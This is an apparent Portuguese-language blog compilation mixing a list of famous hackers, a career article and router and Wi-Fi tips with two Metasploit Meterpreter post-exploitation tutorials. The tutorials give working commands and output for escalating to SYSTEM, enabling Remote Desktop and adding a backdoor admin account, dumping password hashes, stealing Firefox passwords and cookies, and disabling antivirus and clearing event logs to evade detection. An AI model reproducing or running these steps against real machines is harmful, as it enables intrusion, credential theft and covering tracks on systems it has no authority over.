15 hackers historicos

1. Steve Jobs e Steve Wozniak

maiores-hackers-existiram_1

Eles ficaram famosos por serem co-fundadores da Apple, mas antes disso, Steve Jobs e Steve Wozniak começaram como hackers. Tudo começou em 1971, um dia antes de Steve Wozniak (na época com 20 anos de idade) começar a faculdade em Berkeley. Ele leu um artigo sobre ‘phone phreaks’ (Phreaker é o nome dado aos hackers de telefonia) e decidiu que queria hackear um telefone também. Então ele ligou para seu amigo Steve Jobs – na época com 17 anos – para dizer isso a ele.

Alguns meses depois, Wozniak já tinha construído seu próprio ‘Blue box’ (Blue box foi um equipamento desenvolvido por John Draper que gerava tons nas frequências necessárias para comunicar-se com a central telefônica), que os permitiu hackear o sistema telefônico da cidade deles liberando ligações gratuitas para qualquer lugar.

A dupla começou vendendo suas versões de blue boxes usando os pseudônimos Oaf Tobar (Jobs) e Berkeley Blue (Wozniak). Wozniak ligou até mesmo para o Vaticano usando sua box, para passar um trote telefônico.


2. Kevin Poulsen

maiores-hackers-ja-existiram_2

Ele se reinventou como jornalista da revista americana Wired, postando matérias sobre segurança da computação. Porém, Kevin Poulson – anteriormente conhecido pelo pseudônimo “Dark Dante” – ficou famoso como um hacker notório ao ser o incrível ganhador de um veículo Porsche de uma promoção da KISS.FM americana. A rádio daria o carro para o 102º a ligar pra lá. Ele descobriu a contagem invadindo os dados da companhia telefônica e programou sua ligação para ser a 102ª da lista. Ele também ficou famoso por invadir registros do FBI.


3. George Hotz


maiores-hackers-ja-existiram_3

Entediado com a aula, George Hotz hackeou a rede de de computadores de sua escola e fez com que a 9ª Sinfonia de Beethoven fosse reproduzida em vários computadores. O seu grande marco, na verdade, aconteceu quando ele conseguiu – aos 17 anos – desbloquear o iPhone da Apple, foi o primeiro sujeito do mundo a criar um jailbreak para seu próprio iPhone, que permitiu que seu aparelho pudesse ser usado em outras operadoras. O anúncio do desbloqueio foi feito no YouTube, e suas primeiras e famosas palavras do vídeo foram “Hi, everyone, I’m GeoHot. This is the world’s first unlocked iPhone” (“Olá todo mundo, Eu sou o GeoHot. Este é o primeiro iPhone desbloqueado do mundo”). De lá pra cá ele diz que a vida inteira dele é um hack. Depois do iPhone, Hotz passou ahackear também o PS3 – mas acabou sendo processado pela Sony.


4. Jonathan James

maiores-hackers-ja-existiram_4

Jonathan James, conhecido pelo pseudônimo “c0mrade,” tinha apenas 15 anos de idade quandohackeou os computadores do Departamento de Defesa americano. E ele não parou por aí, até mesmo conseguiu assumir os controles da NASA e conseguia controlar, do computador da casa dele, a temperatura e umidade da Estação Espacial Internacional. James foi o primeiro jovem a ser punido pelas leis americanas de crime cibernético. Ele se matou em 2008, dando um tiro em sua própria cabeça.


5. Kevin Mitnick

maiores-hackers-ja-existiram_5

Kevin Mitnick foi um dos hackers de computadores mais procurados do mundo. Em um determinado momento, ele até mesmo resolveu se confinar, porque acreditava que poderia dar início a uma guerra nuclear. Mitnick alega que já hackeou a Sun Microsystems, a Motorola, e a Nokia. O seu hack favorito aconteceu quando ele ainda era criança, ele invadiu e tomou o controle do alto falante dodrive-thru de um McDonald’s perto da sua casa. Segundo ele, “Eu estava do outro lado da rua, pegava os pedidos e dizia para os clientes que a pessoa era o 50º cliente, portanto o pedido seria de graça. Para outros clientes eu dizia ‘Nosso sistema de detecção de peso determinou que seu carro está um muito pesado, então iremos trocar o Big Mac por Salada.’ Melhor ainda foi quando a polícia chegou para comprar e eu disse ‘Esconde a Cocaína, esconde a cocaína!’”.


6. Gary McKinnon

maiores-hackers-ja-existiram_6

O hacker escocês Gary McKinnon é responsável pela “maior invasão de computadores militares de todos os tempos.” O governo americano o acusou por ter hackeado o Exército, a Marinha, a Força Aérea e o Departamento de Defesa, além de 16 computadores da NASA. McKinnon nega ser um hacker mal intencionado, ele afirma que é apenas um “nerd desajeitado.” De acordo com ele, o objetivo das invasões era encontrar evidência de vida alienígena. Seu objetivo era, segundo ele, expor o que ele havia descoberto, uma peça construída pelo dpto. de engenharia reversa militar americano de um sistema de propulsão anti-gravidade que eles supostamente pegaram de uma nave alienígena.


7. Adrian Lamo

maiores-hackers-ja-existiram_7

Adrian Lamo é conhecido como “O Hacker Andarilho”, porque ele geralmente faz suas invasões a partir de cyber cafés, bibliotecas e lanchonetes. O jornal The New York Times ajudou com sua prisão, após ele ter invadido os computadores da sede e ter adicionado seu próprio nome como primeiro de uma lista de “experts” em computadores. Lamo também ficou famoso por quebrar uma série de sistemas de alta segurança de rede de computadores, como a Microsoft, a Yahoo!, a MCI WorldCom, a Excite@Home, as empresas de telefonia SBC, Ameritech e Cingular. Em 2010, Lamo ganhou ainda mais fama por entregar centenas de milhares de documentos do governo para o WikiLeaks.

8. Robert Tappan Morris

maiores-hackers-ja-existiram_8

Robert Tappan Morris ficou famoso por criar um famoso vírus chamado “Morris”, em 1988. O vírus foi o primeiro a se espalhar pela internet desativando cerca de 10% dos computadores ligados à internet no mundo. Segundo Morris, ele não tinha a intenção de causar prejuízos com seu vírus. Em vez disso, ele afirma ter inventado o vírus para ter uma ideia do tamanho da internet. Por fim, Morris acabou se tornando a primeira pessoa a ser condenada por Fraude e Abuso a Computadores. Morris hoje é professor no MIT.


9. Mike Calce

maiores-hackers-ja-existiram_9

Mike Calce – conhecido pelo pseudônimo MafiaBoy – foi o único garoto de 15 anos de idade a hackear algumas das maiores lojas virtuais do mundo. Seu hack afetou lojas grandes como Amazon, eBay, e Yahoo! Calce foi preso após ter revelado informações sobre suas invasões se gabando em salas de bate-papo on-line.


10. David L Smith

maiores-hackers-ja-existiram_10

David L Smith é o hacker que disseminou o famoso vírus “Melissa” em 1999. O vírus se propagou pela internet e atingiu contas de e-mail do mundo inteiro, causando um colapso na rede por causa da sobrecarga nos servidores de e-mail. Sua obra prima lhe garantiu um nome na “calçada da fama” dos hackers, mas causou um prejuízo estimado de US$ 80 milhões. Como resultado, ele teve que ficar 20 meses atrás das grades.


11. Julian Assange

maiores-hackers-existiram_11

Ele é mais conhecido por ter fundado o WikiLeaks, mas Julian Assange já foi um hacker adolescente australiano talentoso conhecido como “Mendax”. Depois de adulto, ele admitiu que “eu fui – assim como todos os hackers, e eu diria que todos os homens são – um pouco autista.” Sobre sua experiência como hacker, ele disse: “Foi certamente viciante. Era possível mergulhar em um sistema de computador. Gostava de de invadir os computadores do Grupo de Comando 8 do Pentágono. Eu ia cada vez mais longe, projetando minha mente durante todo o caminho a partir do meu quarto desarrumado, para todo o sistema ao longo dos corredores do Pentágono, e durante todo o tempo eu estava aprendendo a entender que os sistemas são melhores do que as pessoas de Washington. Era como ser capaz de teletransportar-se para o interior do Pentágono, andando por lá e assumindo o controle.”


12. Albert Gonzalez

maiores-hackers-existiram_12

Albert Gonzalez é um hacker de computador notório que assumiu pseudônimos como SoupNazi e KingChilli. Entre 2005 e 2007, ele planejou e roubou mais de 170 milhões com cartões de débito e crédito hackeando lojas americanas famosas como DSW, Office Max, Boston Market, Barnes & Noble, e TJ Maxx. Juntando toda fortuna que Gonzalez acumulou roubando, encontraram um barril com US$ 1,2 milhões enterrado no quintal de seus pais.


13. Vladimir Levin

maiores-hackers-existiram_13

Vladimir Levin é um hacker russo responsável por arquitetar e realizar o roubo de um banco em São Petersburgo, EUA. Ele e seus comparsas roubaram mais de US$ 10 milhões de contas bancárias do Citibank e transferiram o dinheiro para outras contas bancárias de diversas cidades ao redor do mundo. Tudo, exceto US$ 400 mil do dinheiro roubado foi recuperado.


14. Hector Xavier Monsegur

maiores-hackers-existiram_14

Hector Xavier Monsegur, também conhecido pelo pseudônimo “Sabu,” é um dos co-fundadores do grupo de hackers LulzSec. Ele é lembrado não por simplesmente ser um hacker, mas por ser um duplo agente do FBI. Ele ajuda a agência a identificar outros hackers.


15. Barnaby Jack

maiores-hackers-existiram_15

Barnaby Jack foi um hacker neozelandês que ficou famoso por demonstrar como fazer com que dois caixas eletrônicos cuspissem dinheiro remotamente, durante a conferência de segurança Black Hat, em 2010. Em outra conferência, em 2011, ele demonstrou como uma bomba de insulina poderia serhackeada remotamente para entregar uma dose letal de insulina no paciente. Na conferência de 2012, Jack demonstrou como é possível invadir dispositivos médicos a atacar pessoas que usam próteses eletrônicas em seus corpos mesmo à distância. Jack morreu uma semana antes da conferência Black Hat 2013 por causas desconhecidas.

Veja a seguir a demonstração dos caixas eletrônicos que o deixou famoso. Avance até os 5:40 do vídeo para ver o caixa cuspindo dinheiro.

//www.youtube.com/embed/v-dS4UFomv0

Coletânea dos piores hackings da TV e do cinema

Um bom programa de televisão deve ser divertido. Filmes também devem levar entretenimento ao espectador. E o hacking da vida real? Bom, ele não é tão legal assim de se ver.

Então, perdoe Hollywood por tentar deixar as coisas mais legais, com luzes piscando e digitação frenética. No fim das contas, é basicamente impossível ser fiel à vida real e, ao mesmo tempo, criar uma cena visualmente interessante que prenda a audiência.

Há toda uma série de problemas, que começa em como as telas dos hackers da vida real não têm nenhum movimento, e um painel com dados estáticos sendo exibido numa telona fica entediante depois de um segundo. O problema fica ainda pior quando se leva em conta que os softwares usados pelos hackers privilegiam a função e não a forma, ao passo que cenas interessantes precisam do exato oposto. Acrescente a isso o fato de que textos pequenos são ilegíveis em qualquer distância de filmagem razoável e pronto, você tem um monte de argumentos para trocar o hacking real por um monte de cores e telas piscando.

Hacking na TV:

01

Hacking na vida real:

02

 

Veja a coletanea de Piores Hackers da TV e do cinema:

https://www.youtube.com/watch?feature=player_embedded&v=QmvL7fgp7TM

Saiba se algum intruso está usando sua wifi

Quem está On My Wifi, executado em segundo plano, monitorando continuamente a rede e notificar quando um dispositivo desconhecido está conectado. Para ser um intruso teria que tomar outras medidas de segurança na rede.

Teste:

Link: desde aquí

Android

Esta aplicação é uma maneira fácil de saber com certeza quem está usando a rede de computadores com ou sem fios a partir do seu dispositivo portátil.

Basta clicar no botão Scan para ver todos os dispositivos conectados à rede sem fio.

 

 

Iphone

Quem está On My Wifi para o iPhone resolve o problema de detectar dispositivos desconhecidos em seu MiFi ou outra rede sem fio pessoal.

Link: App Store

Com esta aplicação gratuita, sem ter que ser os administradores de rede, pode-se obter as mesmas informações dos roteadores do painel de gerenciamento de recurso, o que nem todos sabem de acesso. A versão gratuita do aplicativo não permite que os usuários bloqueiem, mas se você tem informação suficiente para saber quem é o passageiro clandestino de sua rede sem fio, certamente irá convidar com bondade completo para deixar você tirar proveito de Internet …

 

Fonte:Carluys

Senhas padrões de roteadores

Às vezes, precisamos configurar um roteador e não sei o acesso de IP ou a senha do usuário para acessar a configuração.

 

RouterIPAddress É um site que recolhe acesso IP, nome de usuário e senha padrão para todas as marcas de roteadores do mundo.

O que temos que fazer é inserir a marca ou o modelo do roteador na busca eo sistema irá mostrar os resultados, entre os quais encontramos a foto padrão para que possamos identificar melhor e ter certeza que é o nosso. Também aqui vemos o acesso IP, usuário e senha por padrão.

Com esses dados podemos acessar a configuração do roteador, obviamente, se ele foi alterado para trazer a fábrica, caso contrário, apenas tem que repor.

Este site é muito útil, mas por outro lado é sempre recomendável alterar a senha que vem de fábrica, especialmente  o seu roteador wi-fi.

Fonte: Carluys

Escalação de Privilegios com MetaSploit FrameWork

Uma vez que um atacante conseguiu engajar um alvo, provavelmente, as primeiras atividades a serem realizadas serão escalar privilégios para executar tarefas de gerenciamento no alvo, cobrir seus rastros e, finalmente, garantir que o acesso à máquina comprometida não seja interrompida, o que significa que, na medida do possível, deve evitar a detecção por sistemas AV, firewalls, IDS, etc.

Uma vez obtida uma consola meterpreter através de algum payload (tal como reverse_tcp) pode ser utilizado a extensão priv:

meterpreter> use priv
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

Como você pode ver, existem diferentes técnicas utilizadas pela extensão priv para elevar os privilégios do console atual, você pode usar uma ou todas as técnicas, se nenhuma parametro é especificado, é utilizado todos os parametros:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Depois de obter um console Meterpreter com privilégios apropriados pode executar algumas operações adicionais para acesso mais seguro a máquinas remotas comprometidos, mas é necessário para obter privilégios … comando anteriormente getSystem meterpreter foi utilizada e foi usado para incógnito “personificar “sessões de usuário, mas às vezes não é possível obter um console de” janelas de matérias “com privilégios de sistema adequado nestes casos tem o script service_permissions_escalate

meterpreter > run service_permissions_escalate

Este script irá abrir tantas sessões quanto possível metepreter através da pesquisa e coleta de licenças de acordo com os programas instalados no computador de destino, o comando, uma vez terminado, você pode fechar o console meterpreter que está aberto e abrir uma nova (tanto que criou o roteiro) e tente executar o comando:

meterpreter > execute -f cmd -i

Desta forma, você pode obter um console “raw” com permissões de sistema para realizar vários tipos de tarefas (como a definição de backdoors através de registro ou sistema AV off).

Depois de abrir este console você pode listar os processos em execução da máquina de destino com o comando tasklist e pode terminar qualquer um deles com o comando taskkill. Embora você possa ver os processos e até mesmo matar alguns deles, em alguns casos, pode haver processos são resistentes ou persistente a excluir prisão por mecanismos convencionais, como no caso de um antivírus potente que detecta malware e outras vulnerabilidades e ameaças podem colocar em risco o sistema, de modo que, nesses casos, é altamente recomendável, tente desativar o antivírus da sessão aberta para garantir que ele não vai destruir a traseira traseira estabelecida.

Sete lições para profissionais de segurança

Sete lições para profissionais de segurança terem mais sucesso

Aprender com as falhas é uma das recomendações dos especialistas para os gestores tenham mais êxito no desafio de proteger os negócios de suas empresas.

Da Redação – Computerworld

14 de janeiro de 2014 – 07h30

A indústria e os profissionais de Segurança estão respondendo a altura, a medida que os roubos de identidade e os riscos de segurança crescem, ou repete falhas do passado? Enquanto as tecnologias para segurança se aprimoram, os criminosos também ganham acesso a ferramentas melhores. Eles é que estão ficando mais espertos?

A sabedoria tradicional diz que é necessário mais equipe com treinamento e certificações de segurança. Outros dizem que salários mais altos, um melhor entendimento dos criminosos ou mais executivos top de linha são necessários. Tudo isso ajuda, mas algumas equipes têm tudo isso e mesmo assim falham. Caem sistematicamente em armadilhas parecidas.

Com base em experiências reais, confira sete lições que qualquer profissional de segurança precisa aprender para ter sucesso:

1 – Segurança costuma ser vista como um problema
Geralmente,  profissionais de segurança são vistos como estraga prazeres, que trazem mais problemas que soluções. No mundo da computação em nuvem, por exemplo, milhares de artigos positivos são escritos por quem fala da tecnologia, mas os artigos da área de segurança só sabem falar quão ruim a nuvem é para segurança da informação.

A dica para superar isso é se esforçar para se tornar um facilitador. Pare de dizer não para os clientes e ofereça soluções seguras para as propostas apresentadas. Diga como garantir que o projeto seja entregue no prazo, no orçamento e com um nível de segurança adequado. Enquanto isso, vá analisando se e como a área de negócios enxerga valor nas suas abordagens.

2 – Segurança é encarada como uma solução única
Outro erro comum dos profissionais de segurança é achar que um tipo de solução pode resolver os problemas de cibersegurança de todos os tipos e tamanhos de empresa. Essa abordagem é errada porque erros de dimensionamento podem colocar uma empresa maior sob risco ou fazer uma empresa menor gastar desnecessariamente em uma solução muito abrangente.

A solução é oferecer aos clientes diferentes níveis de solução para as empresas. Estudar o mercado, acompanhar avaliações de consultorias como Gartner e Forrester, ficar em contato constante com associações de segurança, tudo isso ajuda a bolar o melhor pacote de soluções para cada caso e auxiliar as áreas de negócios a entenderem os riscos e benefícios associados à cada opção.

3 – Um pouco mais de humildade ajudaria
Não há dúvida que todos os clientes do mundo gostam de trabalhar com pessoas positivas, amigáveis, humildes e com atitudes pacientes. Essa descrição, infelizmente, não cabe à maioria dos profissionais de segurança. A consequência é que eles tendem a desprezar processos e trabalhar somente nas demandas que parecem mais ameaçadoras. O profissional de segurança adora combater inimigos e acaba se esquecendo a razão da segurança e da existência do seu time.

Para driblar esse problema, é necessário mostrar humildade genuína aliada à excelência profissional. Admitir que os criminosos estão cada vez melhores e trabalhando mais duro para derrotar o que você está fazendo é uma atitude interessante. Pensar assim fará o profissional de segurança pensar em ter  mais planejamento, colaboração e trabalhar em processos com ciclo me vida projetada. Paralelamente, uma boa atitude do profissional é se engajar em atividade sociais da companhia e mostrar que faz parte do time.

4 – Profissionais tendem a achar que o cliente não sabe nada da área
Alguns profissionais de segurança veem clientes como agentes irritantes, que não sabem do que estão falando quando o assunto é segurança. Combinada com a falta de paciência em realizar explicações claras, essa atitude leva o profissional a concluir que o cliente nunca entenderá o real problema. Um grande erro.

Ocorre que 90% das questões mal compreendidas, segundo especialistas, são erros relacionados às pessoas e a relacionamentos ruins. Os profissionais precisam entender que as pessoas que surgem com demandas não têm, como missão, irritá-los: elas têm família, torcem para times, praticam seus hobbies.  Relacione-se, conheça melhor cada pessoa, construa confiança e constate que cada um tem seus conhecimentos e que vale a pena um esforço para compartilhá-los.

5 – Cyber ética: você é uma ameaça interna?
Muitos profissionais de segurança costumam se ver como hackers do bem que não devem seguir políticas que os outros funcionários seguem. No entanto, quanto mais o profissional aprende e se torna “hacker do bem”, mais a tentação cresce. As informações com as quais vai se deparar testará a ética e a honestidade do profissional o tempo todo.

O ideal é não ter essa atitude. Respeitar as políticas da empresa, mesmo que tenha o poder de desrespeitá-lo, é a melhor forma de manter o emprego, reputação e ainda dar um bom exemplo. É bom nunca subestimar o risco aos quais se expõe, pois ninguém age sem deixar rastros.

6 – Esgotamento mental na carreira
Muitos profissionais de segurança sentem sintomas de esgotamento em algum ponto da carreira. Pesquisas indicam que a área de segurança é onde se encontra a maioria desses profissionais. Eles acham que todos os dias são ruins, levam para casa o que têm de negativo no trabalho, sentem-se exaustos o tempo todo, acham que todas as tarefas são tediosas e acham que nada do que fazem é valorizado.

Superar isso é difícil, mas requer uma boa dose de perseverança e equilíbrio entre a vida pessoal e a profissional. A melhor coisa na carreira é antecipar possíveis estresses e trabalhar em cima de sinais que podem levar ao esgotamento. Em segundo lugar, o profissional deve analisar sua situação pelo menos uma vez por ano para avaliar o que está bom, o que está ruim e o que poderia causar um problema. Não seria hora de planejar folgas, férias, buscar alguma realização pessoal?

Reconhecer a carreira como uma maratona, e não um sprint final, é uma boa atitude também. O profissional não vai ser usado, esgotado e descartado, como um ciclo único. A carreira é repleta de ciclos.

7 – Perspectivas ruins e sensação de estagnação
Muitos profissionais de segurança se esquecem de características comportamentais, como atitude, relacionamento, liderança, entre outros, para se concentrar só nas técnicas. Isso quase sempre leva à sensação de estagnação vivida pela maioria.

Para evitar que isso ocorra, a melhor forma é desenvolver estratégicas práticas, como respeitar sua própria posição como um papel importante na empresa, se voluntariar para comitês ou equipes de atividades paralelas na empresa e tentar gerar boas ideias para a organização, participando de discussões sobre problemas e eventuais soluções. Essas atitudes práticas auxiliam o desenvolvimento de características pessoais e melhoram as perspectivas de crescimento e as chances de avanço na carreira.

Fonte: http://computerworld.uol.com.br/carreira/2014/01/14/sete-licoes-para-professionais-de-seguranca-terem-sucesso/?goback=.gmp_4216332#!

Canais sobre segurança da informação no youtube

Para o pessoal que vive procurando coisas legais e focadas em segurança, eu gostaria de listar alguns dos canas de S.I. mais legais do youtube, mas todos em inglês:

São eles:

 

Fonte:CorujadeTI

Tecnica NINJA de roubar dados em caixa eletrônico

Velho, olha o aparato tecnológico, com tela, processador, tecladinho, baterias de longa duração, tudo conectado a um chip de celular para enviar os dados dos cartões online para os golpistas.

Antes de sacar dinheiro a gente precisa tentar sacar o painel do caixa?

http://www.youtube.com/embed/z1CrmlK5zMM

Detalhes do primeiro video:

http://krebsonsecurity.com/tag/atm-skimmer/

Meterpreter…E depois do shell?Faz o que?

Estou escrevendo aqui este artigo para ficar uma dica , ou um norte (ideia) do que se fazer após se obter um shell na máquina.

Não vou entrar aqui nos detalhes de como se ganhar o shell na máquina ou do que se trata, pois se você está lendo este texto, acredito eu que você tenha noção do que está procurando.

Vou supor aqui que exploramos o clássico MS08_067.

Após aberta a sessão do meterpreter, muitos newbes ficam parados vendo uma tela preta cheia de letras rindo pois acabou de ter um shell, mas não sabe mais o que fazer dali para frente. Existem infinitas possibilidades, mas como comentei no inicio, o objetivo aqui é deixar uma base, uma ideia, um norte!

Acessando remotamente

Uma das coisas que podem ser feitas de inicio é acessar a máquina remotamente via Remote Desktop. Esse e o jeito mais pratico, rápido, mas é mais agressivo, deixa uitos vestígios, as vezes tem muitos usuários logados e enestes casos este método pode ser complicado. Supondo que você já esteja com o meterpreter aberto após explorar a falha, dê o comando shell para ganhar acesso á máquina e siga o seguinte procedimento:

Habilite o Remote Desktop com o seguinte comando:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Se quiser desabilitar depois para não deixar rastros:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Agora você precisa add um usuário local com poderes administrativos, para conseguir se logar

PS: Se quiser habilitar a assistência remota ( OPCIONAL)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Criando o usuário local:

net user NOME_DO_USUARIO SENHA /add

Adicionando o usuário a um grupo:

net localgroup GRUPO USUARIO_CRIADO /add

Agora está prontinho, basta se conectar via remote Desktop, e se logar com seu usuário e senha criados.

Acessando o C: executando um processo:

execute -f “cmd.exe” -i -H

Usando o próprio meterpreter

Os scripts do Meterpreter são rotinas que podem ser executados a partir do intérprete e permite que você execute  ações específicas sobre o alvo e  são utilizadas para automatizar tarefas e agilizar atividades , os scripts disponíveis são executadas por linha de comando, alguns scripts úteis são:

arp_scanner

Vamos encontrar outras máquinas que estão no segmento de rede ou cometeram conexão com a máquina, para que você possa encontrar endereços IP e MAC das máquinas que têm acesso ao alvo, um cenário típico para isso é o acesso a partir de Internet a uma intranet , por exemplo:

Supondo-se que um pentester entrou em uma máquina que tem 2 interfaces de rede , uma das quais é dedicada à internet eo outro é para a conexão em intranet, porque o pentester tem acesso a esta máquina , você pode facilmente identificar essas interfaces de rede e , em seguida, executar máquinas de varredura no segmento de rede da intranet através de requisições ARP da seguinte forma:

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.OPTIONS:-h Help menu.-i Enumerate Local Interfaces-r <opt> The target address range or CIDR identifier

-s Save found IP Addresses to logs.

meterpreter > run arp_scanner -i

[*] Enumerating Interfaces

[*] National Semiconductor DP83815-Based PCI Fast Ethernet Adapter – Packet Scheduler Miniport

[*] 192.168.1.34

[*] 255.255.255.0

[*]

meterpreter > run arp_scanner -r 192.168.1.1/24

[*] ARP Scanning 192.168.1.1/24

[*] IP: 192.168.1.1 MAC 64:68:c:45:71:88

[*] IP: 192.168.1.33 MAC 4c:f:6e:e9:7f:16

[*] IP: 192.168.1.34 MAC 0:d:9d:82:cc:69

[*] IP: 192.168.1.35 MAC 0:1c:bf:5a:2a:25

checkvm:

Verifique se o alvo está sendo executado em uma máquina virtual ou um físico:

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine …..[*] It appears to be physical host.

credcollect:

Com este comando, a lista de hashes que são armazenados no SAM dos dados alvo é obtido (Gosto muito desse comando, depois é so rodar um bruteforce):

meterpreter > run credcollect
[+] Collecting hashes…Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0Extracted: ASPNET:f398e05bcb3020ceff92d55aff8ce62c:86ceb0fb2a9e29524943fed3ef434477………

enum_firefox:

Com este script você pode saber se o computador de destino está instalado FireFox e se assim for, o comando tentará baixar todas as informações armazenadas nesse navegador, objectos, tais como cookies, senhas salvas, histórico de navegação, etc.

meterpreter > run enum_firefox
[*] Firefox was found on this system.[*] Extracting Firefox data for user Owner[*] Downloading Firefox Password file to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownercert8.db’

[*] Downloading Firefox Password file to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownerkey3.db’

[*] Downloading Firefox Password file to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownersignons.sqlite’

[*] Downloading Firefox Database file cookies.sqlite to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownercookies.sqlite’

[*] Downloading Firefox Database file formhistory.sqlite to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownerformhistory.sqlite’

[*] Downloading Firefox Database file places.sqlite to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownerplaces.sqlite’

[*] Downloading Firefox Database file places.sqlite-journal to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownerplaces.sqlite-journal’

[*] Downloading Firefox Database file search.sqlite to ‘/root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Ownersearch.sqlite’

[*] Getting Firefox Bookmarks for Owner

[*] Saving to /root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Owner_bookmarks.txt

[*] Getting list of Downloads using Firefox made by Owner

[*] Saving Download list to /root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Owner_download_list.txt

[*] Getting Firefox URL History for Owner

[*] Saving URL History to /root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Owner_history.txt

[*] Getting Firefox Form History for Owner

[*] Saving Firefox Form History to /root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Owner_form_history.txt

[*] Getting Firefox Search History for Owner

[*] Saving Firefox Search History to /root/.msf3/logs/scripts/enum_firefox/192.168.1.34_20110313.4328/Owner_search_history.txt

[*] It appears that Search History has been cleared

[*] Getting Firefox Cookies for Owner

Pode ser interessante para o usuário para extrair dados e senhas armazenadas lá para isso se usa o FirePassword , o procedimento é o seguinte:
1. Faça o download do programa (. Exec)

2. Procurar a partir Meterpreter para o diretório onde você fez o download ou o programa é armazenado usando os comandos getlwd e lcd (estes comandos permitem consultar o diretório atual (local) e mudar o caminho do diretório atual (local)

3. Em seguida, use o comando Meterpreter upload e fazer o upload do arquivo executável para a máquina remota.

4. Agora, execute o comando shell para abrir um console no sistema remoto e executar o FirePassword programa na máquina remota, com isso, o programa irá listar as rotas de navegação utilizados e suas credenciais de correspondentes em texto simples (no caso são armazenadas no navegador).

get_application_list

Obtém uma lista dos aplicativos que estão instalados no sistema comprometido com o número da versão que lhes estão associados:

meterpreter > run get_application_list
Installed Applications======================Name Version—- ——-7-Zip 4.65

Conexant 56K ACLink Modem

Open Command Prompt Shell Extension (x86-32) 2.0.1.0

……..

enum_logged_on_users

Fornece informações sobre os usuários que são atualmente logados:

meterpreter > run enum_logged_on_users -c
Current Logged Users====================SID User— —-

S-1-5-19 Local Service

S-1-5-20 Network Service

S-1-5-21-1004336348-1957994488-842925246-1003 Owner

S-1-5-21-1004336348-1957994488-842925246-1005

S-1-5-18 SYSTEM

get_env

Retorna as variáveis ​​de ambiente da vítima, permitindo conhecer as características físicas das variáveis ​​de máquina-alvo e de ambiente utilizadas como referência para o software instalado no destino, por muito úteis atividades de pós-exploração de um script do sistema é especificamente para coletar informações sobre a máquina comprometida.

scraper

Vamos coletar informações sobre o sistema e  arquivos armazenados no sistema local, a informação recolhida inclui, compartilhamentos de rede, senhas, entradas de registro, etc. toda esta informação é baixado e, em seguida, pode ser usado para apoiar o processo de pós-exploração do sistema, a fim de fortalecer o conhecimento da mesma.

meterpreter > run scraper
[*] New session on 192.168.1.34:31337…[*] Gathering basic system information…

[*] Dumping password hashes…

[*] Obtaining the entire registry…

[*] Exporting HKCU

[*] Downloading HKCU (C:\DOCUME~1\Owner\LOCALS~1\Temp\vXPnWyUV.reg)

[*] Cleaning HKCU

[*] Exporting HKLM

[*] Downloading HKLM (C:\DOCUME~1\Owner\LOCALS~1\Temp\yeglhdIM.reg)

[*] Cleaning HKLM

[*] Exporting HKCC

[*] Downloading HKCC (C:\DOCUME~1\Owner\LOCALS~1\Temp\ydknHdsv.reg)

[*] Cleaning HKCC

[*] Exporting HKCR

[*] Downloading HKCR (C:\DOCUME~1\Owner\LOCALS~1\Temp\aOduEHXB.reg)

[*] Cleaning HKCR

[*] Exporting HKU

[*] Downloading HKU (C:\DOCUME~1\Owner\LOCALS~1\Temp\wGFcKQnj.reg)

[*] Cleaning HKU

[*] Completed processing on 192.168.1.34:31337…

winenum

Este é um script que retorna todas as informações sobre o sistema de destino, misturando alguns dos acima, bem como outros comandos úteis , este scripts de informação, gera um relatório consolidado sobre todo o sistema de comunicação de dados relevantes  por isso, é altamente recomendado para uso em um processo de pós-exploit de um sistema.

meterpreter > run winenum -h
WinEnum — Windows local enumerationRetrieves all kinds of information about the systemincluding environment variables, network interfaces,routing, user accounts, and much more. Results are

stored in /root/.msf3/logs/scripts/winenum

OPTIONS:

-c Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog

-h Help menu.

-m Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything

-r Dump, compress and download entire Registry

meterpreter > run winenum

[*] Running Windows Local Enumerion Meterpreter Script

[*] New session on 192.168.1.34:31337…

[*] Saving general report to /root/.msf3/logs/scripts/winenum/OWNER_20110314.2422/OWNER_20110314.2422.txt

[*] Output of each individual command is saved to /root/.msf3/logs/scripts/winenum/OWNER_20110314.2422

[*] Checking if OWNER is a Virtual Machine ……..

[*] UAC is Disabled

[*] Running Command List …

[*] running command cmd.exe /c set

[*] running command ipconfig /all

……………….

prefetchtool

